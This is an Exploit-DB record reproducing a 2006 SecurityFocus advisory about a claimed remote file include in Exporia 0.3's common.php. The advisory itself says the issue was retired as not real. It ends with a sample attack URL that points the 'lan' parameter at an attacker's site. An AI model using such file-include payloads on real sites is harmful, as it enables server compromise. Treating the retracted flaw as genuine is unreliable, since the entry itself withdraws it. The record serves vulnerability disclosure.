Exporia 0.3 Common.PHP Remote File Include Vulnerability

2006-09-25T00:00:00
ID EDB-ID:28673
Type exploitdb
Reporter Root3r_H3ll
Modified 2006-09-25T00:00:00

Description

Exporia 0.3 Common.PHP Remote File Include Vulnerability. CVE-2006-5920. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20205/info

Exporia is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied data.

Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This BID is being retired because further analysis reveals that the application is not vulnerable to this issue.

http://www.example.com/[path]/common.php?lan=attacker's site